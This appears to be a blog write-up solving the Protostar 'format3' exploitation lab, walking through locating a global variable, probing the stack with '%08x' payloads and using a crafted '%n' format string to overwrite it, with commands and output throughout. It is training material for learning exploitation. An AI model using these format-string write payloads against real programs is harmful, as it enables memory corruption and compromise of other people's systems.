About:
This level advances from format2 and shows how to write more than 1 or 2 bytes of memory to the process. This also teaches you to carefully control what data is being written to the process memory (link)
Source Code:
This one looks very similar to the previous one, except the printf call is in a separate function and the value we need to set target to is much greater than before.
We start out the same way as before, getting the location of target in memory:
user@protostar:/opt/protostar/bin$ objdump -t ./format3 | grep "target"
080496f4 g O .bss 00000004 target
Then we figure out how far up the stack our input is being placed (same method as before):
user@protostar:/opt/protostar/bin$ python -c "print 'AAAAAAAA' + '%08x.'*10" | ./format3
AAAAAAAA00000000.bffff5d0.b7fd7ff4.00000000.00000000.bffff7d8.0804849d.bffff5d0.00000200.b7fd8420.
target is 00000000 :(
user@protostar:/opt/protostar/bin$ python -c "print 'AAAAAAAA' + '%08x.'*100" | ./format3
AAAAAAAA00000000.bffff5d0.b7fd7ff4.00000000.00000000.bffff7d8.0804849d.bffff5d0.00000200.b7fd8420.bffff614.41414141.41414141.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.
target is 00000000 :(
There it is!
Now let's zero in on it:
user@protostar:/opt/protostar/bin$ python -c "print 'AAAA' + '%08x.'*11 + '%08x'" | ./format3
AAAA00000000.bffff5d0.b7fd7ff4.00000000.00000000.bffff7d8.0804849d.bffff5d0.00000200.b7fd8420.bffff614.41414141
target is 00000000 :(
Ok, now let's replace the As with our target address and get ready to swap out a %x with a %n to trigger a write:
user@protostar:/opt/protostar/bin$ python -c "print '\xf4\x96\x04\x08' + '%08x.'*11 + '%08x'" | ./format3
?00000000.bffff5d0.b7fd7ff4.00000000.00000000.bffff7d8.0804849d.bffff5d0.00000200.b7fd8420.bffff614.080496f4
target is 00000000 :(
Ok, now let's trigger the write and see what happens:
user@protostar:/opt/protostar/bin$ python -c "print '\xf4\x96\x04\x08' + '%08x.'*11 + '%n'" | ./format3
?00000000.bffff5d0.b7fd7ff4.00000000.00000000.bffff7d8.0804849d.bffff5d0.00000200.b7fd8420.bffff614.
target is 00000067 :(
Looks good! We're hitting the target, but just with the wrong value...
Let's fiddle around with the amount of bytes printed before the %n until we get it set to the right value:
user@protostar:/opt/protostar/bin$ python -c "print '\xf4\x96\x04\x08' + '%1539100x.'*11 + '%n'" | ./format3 | tail -n 1
target is 01025543 :(
user@protostar:/opt/protostar/bin$ python -c "print '\xf4\x96\x04\x08' + ' ' + '%1539100x.'*11 + '%n'" | ./format3 | tail -n 1
you have modified the target :)
There we go!
Great, Thanks !
ReplyDelete